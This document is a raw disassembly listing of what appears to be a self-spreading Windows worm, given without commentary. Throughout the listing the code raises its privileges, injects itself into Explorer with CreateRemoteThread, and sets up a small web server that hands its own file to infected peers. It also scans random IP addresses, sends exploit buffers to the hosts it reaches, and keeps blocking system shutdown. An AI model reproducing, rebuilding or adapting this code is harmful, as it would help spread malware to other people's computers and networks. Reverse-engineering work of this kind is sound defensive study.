call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; CloseHandle
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31424D38
push ebx
call esi ; send
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19x ; "u19x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
